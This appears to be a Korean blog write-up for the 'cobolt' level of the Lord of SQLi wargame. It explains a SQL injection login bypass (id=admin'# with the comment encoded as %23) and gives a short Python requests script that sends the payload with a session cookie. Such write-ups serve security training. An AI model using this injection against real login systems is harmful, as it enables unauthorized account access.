문제
문제 분석
id와 pw에 "prob" , "_" , "." 를 피해 id에 값이 admin이면 문제가 풀린다.
문제풀이
id에 admin을 넣어준뒤 '(싱글쿼터)로 닫아주고 뒤의 쿼리를 주석으로 처리해준다.
URL?id=admin' #
url을 조작할시 %23으로 입력해줘야한다.
문제 풀이 코드
import requests
url = 'https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php'
session = {'PHPSESSID' : 'p2huvnk8ab645nt9kdjit5js0k'} #로그인 쿠키
data={}
data['id']="admin'#"
res = requests.get(url, params=data, cookies=session)
print(res.url)
if "Clear!" in res.text:
print("\nClear!")
else:
print("try again!")
'LOS-write up' 카테고리의 다른 글
| LOS 6(darkelf) (0) | 2021.01.03 |
|---|---|
| LOS 5(wolfman) (0) | 2021.01.03 |
| LOS 4(orc) (0) | 2021.01.03 |
| LOS 3(goblin) (0) | 2021.01.03 |
| LOS 1 (gremlin) (0) | 2021.01.03 |
